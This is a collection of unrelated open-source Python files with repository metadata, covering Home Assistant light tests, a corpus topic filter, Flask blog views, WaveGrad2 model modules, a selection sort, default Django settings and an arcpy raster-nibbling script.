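atexit.unregister(flush_logs)   # flush_logs will no longer run at exit
# Registered functions run in last-in, first-out order at normal termination.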
17a0b25b7520802c0316a50b66f74a804df1a76e
|
caaf56727714f8c03be38710bc7d0434c3ec5b11
|
/tests/components/abode/test_light.py
|
6506746783c2c8bc154c57ee3317833d02c7ff28
|
[
"Apache-2.0"
] |
permissive
|
tchellomello/home-assistant
|
c8db86880619d7467901fd145f27e0f2f1a79acc
|
ed4ab403deaed9e8c95e0db728477fcb012bf4fa
|
refs/heads/dev
| 2023-01-27T23:48:17.550374 | 2020-09-18T01:18:55 | 2020-09-18T01:18:55 | 62,690,461 | 8 | 1 |
Apache-2.0
| 2023-01-13T06:02:03 | 2016-07-06T04:13:49 |
Python
|
UTF-8
|
Python
| false | false | 4,040 |
py
|
"""Tests for the Abode light device."""
from homeassistant.components.abode import ATTR_DEVICE_ID
from homeassistant.components.light import (
ATTR_BRIGHTNESS,
ATTR_COLOR_TEMP,
ATTR_RGB_COLOR,
DOMAIN as LIGHT_DOMAIN,
)
from homeassistant.const import (
ATTR_ENTITY_ID,
ATTR_FRIENDLY_NAME,
ATTR_SUPPORTED_FEATURES,
SERVICE_TURN_OFF,
SERVICE_TURN_ON,
STATE_ON,
)
from .common import setup_platform
from tests.async_mock import patch
DEVICE_ID = "light.living_room_lamp"
async def test_entity_registry(hass):
"""Tests that the devices are registered in the entity registry."""
await setup_platform(hass, LIGHT_DOMAIN)
entity_registry = await hass.helpers.entity_registry.async_get_registry()
entry = entity_registry.async_get(DEVICE_ID)
assert entry.unique_id == "741385f4388b2637df4c6b398fe50581"
async def test_attributes(hass):
"""Test the light attributes are correct."""
await setup_platform(hass, LIGHT_DOMAIN)
state = hass.states.get(DEVICE_ID)
assert state.state == STATE_ON
assert state.attributes.get(ATTR_BRIGHTNESS) == 204
assert state.attributes.get(ATTR_RGB_COLOR) == (0, 63, 255)
assert state.attributes.get(ATTR_COLOR_TEMP) == 280
assert state.attributes.get(ATTR_DEVICE_ID) == "ZB:db5b1a"
assert not state.attributes.get("battery_low")
assert not state.attributes.get("no_response")
assert state.attributes.get("device_type") == "RGB Dimmer"
assert state.attributes.get(ATTR_FRIENDLY_NAME) == "Living Room Lamp"
assert state.attributes.get(ATTR_SUPPORTED_FEATURES) == 19
async def test_switch_off(hass):
"""Test the light can be turned off."""
await setup_platform(hass, LIGHT_DOMAIN)
with patch("abodepy.AbodeLight.switch_off") as mock_switch_off:
assert await hass.services.async_call(
LIGHT_DOMAIN, SERVICE_TURN_OFF, {ATTR_ENTITY_ID: DEVICE_ID}, blocking=True
)
await hass.async_block_till_done()
mock_switch_off.assert_called_once()
async def test_switch_on(hass):
"""Test the light can be turned on."""
await setup_platform(hass, LIGHT_DOMAIN)
with patch("abodepy.AbodeLight.switch_on") as mock_switch_on:
await hass.services.async_call(
LIGHT_DOMAIN, SERVICE_TURN_ON, {ATTR_ENTITY_ID: DEVICE_ID}, blocking=True
)
await hass.async_block_till_done()
mock_switch_on.assert_called_once()
async def test_set_brightness(hass):
"""Test the brightness can be set."""
await setup_platform(hass, LIGHT_DOMAIN)
with patch("abodepy.AbodeLight.set_level") as mock_set_level:
await hass.services.async_call(
LIGHT_DOMAIN,
SERVICE_TURN_ON,
{ATTR_ENTITY_ID: DEVICE_ID, "brightness": 100},
blocking=True,
)
await hass.async_block_till_done()
# Brightness is converted in abode.light.AbodeLight.turn_on
mock_set_level.assert_called_once_with(39)
async def test_set_color(hass):
"""Test the color can be set."""
await setup_platform(hass, LIGHT_DOMAIN)
with patch("abodepy.AbodeLight.set_color") as mock_set_color:
await hass.services.async_call(
LIGHT_DOMAIN,
SERVICE_TURN_ON,
{ATTR_ENTITY_ID: DEVICE_ID, "hs_color": [240, 100]},
blocking=True,
)
await hass.async_block_till_done()
mock_set_color.assert_called_once_with((240.0, 100.0))
async def test_set_color_temp(hass):
"""Test the color temp can be set."""
await setup_platform(hass, LIGHT_DOMAIN)
with patch("abodepy.AbodeLight.set_color_temp") as mock_set_color_temp:
await hass.services.async_call(
LIGHT_DOMAIN,
SERVICE_TURN_ON,
{ATTR_ENTITY_ID: DEVICE_ID, "color_temp": 309},
blocking=True,
)
await hass.async_block_till_done()
# Color temp is converted in abode.light.AbodeLight.turn_on
mock_set_color_temp.assert_called_once_with(3236)
|
[
"[email protected]"
] | |
5efc101cdbf8e412920f0ccebaf0c2a572e6f7ba
|
af6e7f0927517375cb4af833f4c52e301bad0af5
|
/corpus_processor/topic_aware/filter_qa_corpus_by_topic_list.py
|
90d3fa8fa6d532a86b504d45378701a28a47ca24
|
[] |
no_license
|
wolfhu/DialogPretraining
|
470334fd815e1299981b827fdc933d237a489efd
|
eeeada92146d652d81ca6e961d1298924ac8435d
|
refs/heads/main
| 2023-06-25T15:22:54.728187 | 2021-07-21T01:40:23 | 2021-07-21T01:40:23 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,834 |
py
|
# encoding: utf-8
import sys
from util.trie import Trie
tag_file_path = '/home/t-yuniu/xiaoice/yuniu/dataset/processed/domain/sport/keywords'
# Tag blacklist
tag_black_dict = {}
# tag_black_dict.setdefault('游戏', True)
tag_trie = Trie()
def detect_tag(sentence):
"""
    Detect every tag that appears in a sentence.
    :param sentence: query or answer
    :return: list of matched tag substrings (empty if none found).
"""
length = len(sentence)
detected_tags = []
for idx in range(length):
node = tag_trie.lookup
idx_tmp = idx
while True:
if idx_tmp >= length:
break
if sentence[idx_tmp] in node:
node = node[sentence[idx_tmp]]
idx_tmp += 1
if Trie.END in node:
detected_tags.append(sentence[idx:idx_tmp])
else:
break
return detected_tags
if __name__ == '__main__':
# build trie from tag file
with open(tag_file_path) as douban_tag_file:
for line in douban_tag_file.readlines():
tag = line.strip()
if len(tag) == 1 or tag in tag_black_dict:
continue
tag_trie.insert(tag)
# filter corpus contain tags
while True:
line = sys.stdin.readline().strip()
if line:
try:
line = line.replace('#', '')
query, answer = line.split('\t')[:2]
# detected_tags = detect_tag(query)
detected_tags = []
detected_tags.extend(detect_tag(answer))
if len(detected_tags) > 0:
print('\t'.join([' '.join(set(detected_tags)), query, answer]))
except ValueError:
sys.stdout.write('Illegal line.\n')
else:
break
|
[
"[email protected]"
] | |
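detect_tag above walks `tag_trie.lookup` character by character from every start index. To run it outside the repo, here is a hedged stand-in for util.trie.Trie exposing only the members the script touches (insert, lookup, END); the real class may differ.
class Trie:
    END = "__end__"                   # sentinel marking a complete tag
    def __init__(self):
        self.lookup = {}              # nested dicts keyed by character
    def insert(self, word):
        node = self.lookup
        for ch in word:
            node = node.setdefault(ch, {})
        node[Trie.END] = True
# e.g. after tag_trie.insert("足球"), detect_tag("我爱足球") returns ["足球"].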
94e3d38dd3a5674a0272aeb4ea010d9f7a9abfd2
|
7dcdd5de0640f07b01b1707c134ec0bd168f641d
|
/fedora_college/modules/content/views.py
|
b1019c221326d657588aa1b01f790aaa7115edba
|
[
"BSD-3-Clause"
] |
permissive
|
MSheezan/fedora-college
|
8e3e741f6ddac481c2bb7bbcde1e70e2b4b56774
|
07dbce3652c6c1796fb0f7b208a706c9e9d90dc1
|
refs/heads/master
| 2021-01-15T22:38:16.831830 | 2014-06-26T07:04:33 | 2014-06-26T07:04:33 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,439 |
py
|
# -*- coding: utf-8 -*-
import re
#import time
from unicodedata import normalize
from flask import Blueprint, render_template
from flask import redirect, url_for, g
from sqlalchemy import desc
from fedora_college.core.database import db
from fedora_college.modules.content.forms import * # noqa
from fedora_college.core.models import * # noqa
from flask_fas_openid import fas_login_required
bundle = Blueprint('content', __name__, template_folder='templates')
from fedora_college.modules.content.media import * # noqa
_punct_re = re.compile(r'[\t !"#$%&\'()*\-/<=>?@\[\\\]^_`{|},.]+')
def slugify(text, delim=u'-'):
"""Generates an slightly worse ASCII-only slug."""
#stri = (time.strftime("%d/%m/%Y"))
#text = stri + "-" + text
result = []
for word in _punct_re.split(text.lower()):
word = normalize('NFKD', word).encode('ascii', 'ignore')
if word:
result.append(word)
return unicode(delim.join(result))
def attach_tags(tags, content):
rem = TagsMap.query.filter_by(content_id=content.content_id).all()
for r in rem:
db.session.delete(r)
db.session.commit()
for tag in tags:
tag_db = Tags.query.filter_by(tag_text=tag).first()
if tag_db is None:
tag_db = Tags(tag)
db.session.add(tag_db)
db.session.commit()
Map = TagsMap(tag_db.tag_id, content.content_id)
db.session.add(Map)
db.session.commit()
@bundle.route('/content/add/', methods=['GET', 'POST'])
@bundle.route('/content/add', methods=['GET', 'POST'])
@bundle.route('/content/edit/<posturl>/', methods=['GET', 'POST'])
@bundle.route('/content/edit/<posturl>', methods=['GET', 'POST'])
@fas_login_required
def addcontent(posturl=None):
form = CreateContent()
form_action = url_for('content.addcontent')
media = Media.query.order_by(desc(Media.timestamp)).limit(10).all()
if posturl is not None:
content = Content.query.filter_by(slug=posturl).first_or_404()
form = CreateContent(obj=content)
if form.validate_on_submit():
form.populate_obj(content)
tags = str(form.tags.data).split(',')
attach_tags(tags, content)
content.rehtml()
db.session.commit()
return redirect(url_for('content.addcontent',
posturl=posturl,
updated="Successfully updated")
)
else:
if form.validate_on_submit():
url_name = slugify(form.title.data)
query = Content(form.title.data,
url_name,
form.description.data,
form.active.data,
form.tags.data,
g.fas_user['username'],
form.type_content.data
)
tags = str(form.tags.data).split(',')
try:
db.session.add(query)
db.session.commit()
attach_tags(tags, query)
return redirect(url_for('content.addcontent',
posturl=url_name,
updated="Successfully updated",
media=media)
)
# Duplicate entry
except Exception as e:
db.session.rollback()
print e
pass
return render_template('content/edit_content.html', form=form,
form_action=form_action, title="Create Content",
media=media)
@bundle.route('/blog', methods=['GET', 'POST'])
@bundle.route('/blog/', methods=['GET', 'POST'])
@bundle.route('/blog/<slug>/', methods=['GET', 'POST'])
@bundle.route('/blog/<slug>', methods=['GET', 'POST'])
def blog(slug=None):
if slug is not None:
try:
posts = Content.query. \
filter_by(slug=slug).all()
        except Exception:
            posts = "No such posts in database."
else:
try:
posts = Content.query. \
filter_by(type_content="blog").all()
        except Exception:
            posts = "Database is empty"
return render_template('blog/index.html',
title='Blog',
content=posts)
|
[
"[email protected]"
] | |
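For reference, two illustrative outputs of slugify above (my assumed expected values, not taken from the repo's tests; the module is Python 2, hence the u'' literals):
assert slugify(u'Hello, World!') == u'hello-world'
assert slugify(u'Fedora College 101') == u'fedora-college-101'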
c2eab84e232f590469f2bb0cea19a803ec121d0f
|
2fabc9255adbe1cc055eb4b2402f8526f389f257
|
/model/modules.py
|
86464633b715d37b344f74882941fce2b5d70ab8
|
[
"MIT"
] |
permissive
|
asr2021/WaveGrad2
|
657323be12d16667fc0a3b7f2a168101e6e913cb
|
ba7715d760999093dd99283f48971c5115210b51
|
refs/heads/main
| 2023-06-02T18:48:56.830462 | 2021-06-23T07:22:10 | 2021-06-23T08:10:54 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 7,959 |
py
|
import os
import torch
import torch.nn as nn
import numpy as np
import torch.nn.functional as F
from .blocks import (
ZoneOutBiLSTM,
LinearNorm,
ConvBlock,
)
from text.symbols import symbols
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
class TextEncoder(nn.Module):
""" Text Encoder """
def __init__(self, config):
super(TextEncoder, self).__init__()
n_src_vocab = len(symbols) + 1
d_word_vec = config["transformer"]["encoder_hidden"]
n_layers = config["transformer"]["encoder_layer"]
d_model = config["transformer"]["encoder_hidden"]
kernel_size = config["transformer"]["encoder_kernel_size"]
dropout = config["transformer"]["encoder_dropout"]
zoneout = config["transformer"]["encoder_zoneout"]
self.d_model = d_model
self.src_word_emb = nn.Embedding(
n_src_vocab, d_word_vec, padding_idx=0
)
self.conv_stack = nn.ModuleList(
[
ConvBlock(
d_model, d_model, kernel_size=kernel_size, dropout=dropout
)
for _ in range(n_layers)
]
)
self.lstm = ZoneOutBiLSTM(
d_model, zoneout_rate=zoneout
)
def forward(self, src_seq, mask=None):
enc_output = self.src_word_emb(src_seq)
for conv in self.conv_stack:
enc_output = conv(enc_output, mask=mask)
enc_output = self.lstm(enc_output)
if mask is not None:
enc_output = enc_output.masked_fill(mask.unsqueeze(-1), 0.)
return enc_output
class VarianceAdaptor(nn.Module):
""" Variance Adaptor """
def __init__(self, preprocess_config, model_config):
super(VarianceAdaptor, self).__init__()
self.duration_predictor = DurationPredictor(model_config)
self.gaussian_upsampling = GaussianUpsampling(model_config)
def forward(
self,
x,
src_mask,
duration_target=None,
d_control=1.0,
):
log_duration_prediction = self.duration_predictor(x, src_mask)
if duration_target is not None:
x, attn = self.gaussian_upsampling(x, duration_target, src_mask)
duration_rounded = duration_target
else:
duration_rounded = torch.clamp(
(torch.round(torch.exp(log_duration_prediction) - 1) * d_control),
min=0,
)
x, attn = self.gaussian_upsampling(x, duration_rounded, src_mask)
return (
x,
log_duration_prediction,
duration_rounded,
attn,
)
class GaussianUpsampling(nn.Module):
""" Gaussian Upsampling """
def __init__(self, model_config):
super(GaussianUpsampling, self).__init__()
# self.range_param_predictor = RangeParameterPredictor(model_config)
def forward(self, encoder_outputs, duration, mask):
device = encoder_outputs.device
# range_param = self.range_param_predictor(encoder_outputs, duration, mask)
t = torch.sum(duration, dim=-1, keepdim=True) #[B, 1]
e = torch.cumsum(duration, dim=-1).float() #[B, L]
c = e - 0.5 * duration #[B, L]
t = torch.arange(1, torch.max(t).item()+1, device=device) # (1, ..., T)
t = t.unsqueeze(0).unsqueeze(1) #[1, 1, T]
c = c.unsqueeze(2)
# print(range_param, 0.1*(range_param ** 2))
# w_1 = torch.exp(-0.1*(range_param.unsqueeze(-1) ** -2) * (t - c) ** 2) # [B, L, T]
# w_2 = torch.sum(torch.exp(-0.1*(range_param.unsqueeze(-1) ** -2) * (t - c) ** 2), dim=1, keepdim=True) # [B, 1, T]
w_1 = torch.exp(-0.1 * (t - c) ** 2) # [B, L, T]
w_2 = torch.sum(torch.exp(-0.1 * (t - c) ** 2), dim=1, keepdim=True) # [B, 1, T]
w_2[w_2==0.] = 1.
# w_1 = self.normpdf(t, c, range_param.unsqueeze(-1)) # [B, L, T]
# w_1 = torch.distributions.normal.Normal(c, 0.1).log_prob(t) # [B, L, T]
# w_2 = torch.sum(w_1, dim=1, keepdim=True) # [B, 1, T]
# w_2[w_2==0.] = 1.
w = w_1 / w_2
out = torch.matmul(w.transpose(1, 2), encoder_outputs)
return out, w
class DurationPredictor(nn.Module):
""" Duration Parameter Predictor """
def __init__(self, model_config):
super(DurationPredictor, self).__init__()
encoder_hidden = model_config["transformer"]["encoder_hidden"]
variance_hidden = model_config["variance_predictor"]["variance_hidden"]
self.duration_lstm = nn.LSTM(
encoder_hidden,
int(variance_hidden / 2), 2,
batch_first=True, bidirectional=True
)
self.duration_proj = nn.Sequential(
LinearNorm(variance_hidden, 1),
nn.ReLU(),
)
def forward(self, encoder_output, mask):
duration_prediction, _ = self.duration_lstm(encoder_output)
duration_prediction = self.duration_proj(duration_prediction)
duration_prediction = duration_prediction.squeeze(-1) # [B, L]
if mask is not None:
duration_prediction = duration_prediction.masked_fill(mask, 0.0)
return duration_prediction
# class RangeParameterPredictor(nn.Module):
# """ Range Parameter Predictor """
# def __init__(self, model_config):
# super(RangeParameterPredictor, self).__init__()
# encoder_hidden = model_config["transformer"]["encoder_hidden"]
# variance_hidden = model_config["variance_predictor"]["variance_hidden"]
# self.range_param_lstm = nn.LSTM(
# encoder_hidden + 1,
# int(variance_hidden / 2), 2,
# batch_first=True, bidirectional=True
# )
# self.range_param_proj = nn.Sequential(
# LinearNorm(variance_hidden, 1),
# nn.Softplus(),
# )
# def forward(self, encoder_output, duration, mask):
# range_param_input = torch.cat([encoder_output, duration.unsqueeze(-1)], dim=-1)
# range_param_prediction, _ = self.range_param_lstm(range_param_input)
# range_param_prediction = self.range_param_proj(range_param_prediction)
# range_param_prediction = range_param_prediction.squeeze(-1) # [B, L]
# if mask is not None:
# range_param_prediction = range_param_prediction.masked_fill(mask, 0.0)
# return range_param_prediction
class SamplingWindow(nn.Module):
""" Sampling Window """
def __init__(self, model_config, train_config):
super(SamplingWindow, self).__init__()
self.upsampling_rate = model_config["wavegrad"]["upsampling_rate"]
self.segment_length_up = train_config["window"]["segment_length"]
self.segment_length = train_config["window"]["segment_length"] // self.upsampling_rate
def pad_seq(self, seq, segment_length):
if len(seq.shape) > 2:
return torch.nn.functional.pad(
seq.transpose(-2, -1), (0, segment_length - seq.shape[1]), 'constant'
).data.transpose(-2, -1)
return torch.nn.functional.pad(
seq, (0, segment_length - seq.shape[1]), 'constant'
).data
def get_hidden_segment(self, hiddens, seq_starts):
batch = list()
for i, (hidden, seq_start) in enumerate(zip(hiddens, seq_starts)):
batch.append(hidden[seq_start:seq_start+self.segment_length])
return torch.stack(batch)
def forward(self, encoder_output, audio, seq_starts=None, full_len=False):
if full_len:
return encoder_output, audio
        if encoder_output.shape[1] > self.segment_length:
            encoder_segment = self.get_hidden_segment(encoder_output, seq_starts)
        else:
            encoder_segment = encoder_output
        encoder_segment = self.pad_seq(encoder_segment, self.segment_length)
audio_segment = self.pad_seq(audio, self.segment_length_up)
return encoder_segment, audio_segment
|
[
"[email protected]"
] | |
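The GaussianUpsampling forward builds weights w[b, l, t] proportional to exp(-0.1 * (t - c_l)^2), normalized over tokens, then mixes token states into frames. A toy sketch with two tokens of duration 2 and 3 (no masking, fixed width as in the module) makes the shapes concrete:
import torch
B, L, H = 1, 2, 4
enc = torch.randn(B, L, H)                      # token states
duration = torch.tensor([[2.0, 3.0]])           # total T = 5 frames
e = torch.cumsum(duration, dim=-1)              # [2., 5.]
c = (e - 0.5 * duration).unsqueeze(2)           # centers [1., 3.5] -> [B, L, 1]
t = torch.arange(1, 6).float().view(1, 1, -1)   # frames 1..5 -> [1, 1, T]
w1 = torch.exp(-0.1 * (t - c) ** 2)             # [B, L, T]
w = w1 / w1.sum(dim=1, keepdim=True)            # normalize over tokens
out = torch.matmul(w.transpose(1, 2), enc)      # [B, T, H]
print(w.shape, out.shape)                       # [1, 2, 5] and [1, 5, 4]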
166670300dc3fb39d4e1883bb546d056fe08ce1f
|
dd09f3ad02785935043b56ea3ef85ed603f4065d
|
/Sorting_Function/Selection_Sorting.py
|
6f03147ffab2db72cf7d3f242eb1efd76270e240
|
[] |
no_license
|
RishavMishraRM/Data_Structure
|
ed70f5a04c2fa8153433e830ef54deb7b9c8bf21
|
0d31d16b48989359d5fef79b00aac1b9ca112a22
|
refs/heads/main
| 2023-06-27T02:40:18.031146 | 2021-07-25T19:01:51 | 2021-07-25T19:01:51 | 330,320,897 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 365 |
py
|
def selection_sort(A):
n = len(A)
for i in range(n-1):
position = i
for j in range(i+1, n):
if A[j] < A[position]:
position = j
temp = A[i]
A[i] = A[position]
A[position] = temp
A = [3, 5, 8, 9, 6, 2]
print('Original Array:',A)
selection_sort(A)
print('Sorted Array:',A)
|
[
"[email protected]"
] | |
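The three-line temp swap above is more commonly written with Python's tuple assignment; an equivalent version for comparison:
def selection_sort_tuple_swap(A):
    n = len(A)
    for i in range(n - 1):
        position = i
        for j in range(i + 1, n):
            if A[j] < A[position]:
                position = j
        A[i], A[position] = A[position], A[i]   # tuple swap, no temp variable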
2fb93afe829de7491a458ced6b6568ea178817ff
|
488e0934b8cd97e202ae05368c855a57b299bfd1
|
/Django/advanced/change_admin/change_admin/settings.py
|
52ac0975d8daac947ffc100a34d19c9282aa57ff
|
[] |
no_license
|
didemertens/udemy_webdev
|
4d96a5e7abeec1848ecedb97f0c440cd50eb27ac
|
306215571be8e4dcb939e79b18ff6b302b75c952
|
refs/heads/master
| 2020-04-25T00:24:45.654136 | 2019-04-13T16:00:47 | 2019-04-13T16:00:47 | 172,377,429 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,184 |
py
|
"""
Django settings for change_admin project.
Generated by 'django-admin startproject' using Django 2.1.7.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.1/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
TEMPLATE_DIR = os.path.join(BASE_DIR,'templates')
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '(w#6#!6oi75z@e2d&((yalznx95yk7exe5fbbx#f1l#0uc=(3w'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'app_videos'
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'change_admin.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [TEMPLATE_DIR],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'change_admin.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.1/howto/static-files/
STATIC_URL = '/static/'
|
[
"[email protected]"
] | |
94469e411f69931b1aa7dec9d60e62e9d87a7eff
|
3e917645a0e1375189c8ee8c1e93ed15348111ef
|
/projects/usxp/archive/parrallel/parallel_nibble_v2.py
|
792bbb8be009b4feb157af5c7e2bf1c7bf54ad07
|
[] |
no_license
|
mbougie/gibbs
|
d4544e688ce2b63530535e1f5102328aece30e0d
|
39d5dc0866fc0dd149d0cf1f22bfd20911a9d29e
|
refs/heads/master
| 2021-01-12T06:59:27.214123 | 2020-01-07T15:48:12 | 2020-01-07T15:48:12 | 83,906,717 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,710 |
py
|
import arcpy
from arcpy import env
from arcpy.sa import *
import multiprocessing
import os
import glob
import sys
import time
import logging
from multiprocessing import Process, Queue, Pool, cpu_count, current_process, Manager
import general as gen
# arcpy.env.overwriteOutput = True
arcpy.env.scratchWorkspace = "in_memory"
case=['Bougie','Gibbs']
#import extension
arcpy.CheckOutExtension("Spatial")
#establish root path for this the main project (i.e. usxp)
rootpath = 'C:/Users/Bougie/Desktop/Gibbs/data/usxp/'
# rootpath = 'D:/projects/ksu/v2/'
### establish gdb path ####
def defineGDBpath(arg_list):
gdb_path = '{}{}/{}/{}.gdb/'.format(rootpath,arg_list[0],arg_list[1],arg_list[2])
# print 'gdb path: ', gdb_path
return gdb_path
####### define raster and mask ####################
class ProcessingObject(object):
def __init__(self, series, res, mmu, years, name, subname, pixel_type, gdb_parent, parent_seq, gdb_child, mask_seq, outraster_seq):
self.series = series
self.res = str(res)
self.mmu =str(mmu)
self.years = years
self.name = name
self.subname = subname
self.parent_seq = parent_seq
self.mask_seq = mask_seq
self.outraster_seq = outraster_seq
self.datarange = str(self.years[0])+'to'+str(self.years[1])
print 'self.datarange:', self.datarange
self.dir_tiles = 'C:/Users/Bougie/Desktop/Gibbs/tiles/'
# s9_ytc30_2008to2016_mmu5_nbl_bfc
if self.name == 'mtr':
self.traj = self.series+'_traj_cdl'+self.res+'_b_'+self.datarange+'_rfnd'
self.gdb_parent = defineGDBpath(gdb_parent)
self.raster_parent = self.traj+self.parent_seq
self.path_parent = self.gdb_parent + self.raster_parent
print 'self.path_parent', self.path_parent
self.gdb_child = defineGDBpath(gdb_child)
self.raster_mask = self.raster_parent + self.mask_seq
self.path_mask = self.gdb_child + self.raster_mask
self.raster_nbl = self.raster_parent + self.outraster_seq
self.path_nbl = self.gdb_child + self.raster_nbl
print 'self.path_nbl', self.path_nbl
self.out_fishnet = defineGDBpath(['ancillary','vector', 'shapefiles']) + 'fishnet_mtr'
print self.out_fishnet
self.pixel_type = "16_BIT_UNSIGNED"
else:
self.gdb_parent = defineGDBpath(['s14', 'post', self.name])
self.yxc_foundation = self.series+'_'+self.name+self.res+'_'+self.datarange+'_mmu'+self.mmu
print 'self.yxc_foundation', self.yxc_foundation
self.path_parent = self.gdb_parent + self.yxc_foundation
print 'self.path_parent', self.path_parent
self.raster_mask = self.yxc_foundation + '_msk'
self.path_mask = self.gdb_parent + self.raster_mask
print 'self.path_mask', self.path_mask
self.out_fishnet = defineGDBpath(['ancillary','vector', 'shapefiles']) + 'fishnet_ytc'
self.pixel_type = "16_BIT_UNSIGNED"
self.raster_nbl = self.yxc_foundation + '_nbl'
print 'self.raster_nbl:', self.raster_nbl
self.path_nbl = self.gdb_parent + self.raster_nbl
print 'self.path_nbl', self.path_nbl
# def existsDataset(self):
# dataset = self.gdb_parent + self.raster_parent + '_nbl'
# if arcpy.Exists(dataset):
# print 'dataset already exists'
# return
# else:
# print 'dataset: ', dataset
# return self.raster_parent + '_nbl'
def create_fishnet():
#delete previous fishnet feature class
arcpy.Delete_management(nibble.out_fishnet)
#acquire parameters for creatfisnet function
XMin = nibble.path_parent.extent.XMin
YMin = nibble.path_parent.extent.YMin
XMax = nibble.path_parent.extent.XMax
YMax = nibble.path_parent.extent.YMax
origCord = "{} {}".format(XMin, YMin)
YAxisCord = "{} {}".format(XMin, YMax)
cornerCord = "{} {}".format(XMax, YMax)
cellSizeW = "0"
cellSizeH = "0"
numRows = 7
numCols = 7
geotype = "POLYGON"
arcpy.env.outputCoordinateSystem = nibble.path_parent.spatialReference
print nibble.path_parent.spatialReference.name
#call CreateFishnet_management function
arcpy.CreateFishnet_management(nibble.out_fishnet, origCord, YAxisCord, cellSizeW, cellSizeH, numRows, numCols, cornerCord, "NO_LABELS", "", geotype)
def execute_task(args):
in_extentDict, nibble = args
fc_count = in_extentDict[0]
# print fc_count
procExt = in_extentDict[1]
# print procExt
XMin = procExt[0]
YMin = procExt[1]
XMax = procExt[2]
YMax = procExt[3]
#set environments
	#Setting the extent environment lets Nibble work on just this tile; there is no need to clip the full raster to the fishnet first
arcpy.env.snapRaster = nibble.path_parent
arcpy.env.cellsize = nibble.path_parent
arcpy.env.extent = arcpy.Extent(XMin, YMin, XMax, YMax)
### Execute Nibble #####################
ras_out = arcpy.sa.Nibble(nibble.path_parent, nibble.path_mask, "DATA_ONLY")
#clear out the extent for next time
arcpy.ClearEnvironment("extent")
# print fc_count
outname = "tile_" + str(fc_count) +'.tif'
#create Directory
outpath = os.path.join("C:/Users/Bougie/Desktop/Gibbs/", r"tiles", outname)
ras_out.save(outpath)
def mosiacRasters(nibble):
tilelist = glob.glob(nibble.dir_tiles+'*.tif')
print tilelist
######mosiac tiles together into a new raster
arcpy.MosaicToNewRaster_management(tilelist, nibble.gdb_parent, nibble.raster_nbl, Raster(nibble.path_parent).spatialReference, nibble.pixel_type, nibble.res, "1", "LAST","FIRST")
##Overwrite the existing attribute table file
arcpy.BuildRasterAttributeTable_management(nibble.path_nbl, "Overwrite")
## Overwrite pyramids
gen.buildPyramids(nibble.path_nbl)
def run(series, res, mmu, years, name, subname, pixel_type, gdb_parent, parent_seq, gdb_child, mask_seq, outraster_seq):
#instantiate the class inside run() function
nibble = ProcessingObject(series, res, mmu, years, name, subname, pixel_type, gdb_parent, parent_seq, gdb_child, mask_seq, outraster_seq)
print nibble.res
# need to create a unique fishnet for each dataset
#create_fishnet()
#remove a files in tiles directory
tiles = glob.glob(nibble.dir_tiles+"*")
for tile in tiles:
os.remove(tile)
#get extents of individual features and add it to a dictionary
extDict = {}
count = 1
for row in arcpy.da.SearchCursor(nibble.out_fishnet, ["SHAPE@"]):
extent_curr = row[0].extent
ls = []
ls.append(extent_curr.XMin)
ls.append(extent_curr.YMin)
ls.append(extent_curr.XMax)
ls.append(extent_curr.YMax)
extDict[count] = ls
count+=1
# print 'extDict', extDict
# print'extDict.items()', extDict.items()
######create a process and pass dictionary of extent to execute task
pool = Pool(processes=cpu_count())
# pool = Pool(processes=1)
pool.map(execute_task, [(ed, nibble) for ed in extDict.items()])
pool.close()
	pool.join()
mosiacRasters(nibble)
|
[
"[email protected]"
] | |
82d8e508bea9d27e596ec5fd5f94d4d16fc0ca40
|
085406a6754c33957ca694878db9bbe37f84b970
|
/网络编程/08-ssh_socket_client.py
|
b91da548705606b59b6c0eb6b8d70cdbb3050767
|
[] |
no_license
|
dewlytg/Python-example
|
82157958da198ce42014e678dfe507c72ed67ef0
|
1e179e4037eccd9fefabefd252b060564a2eafce
|
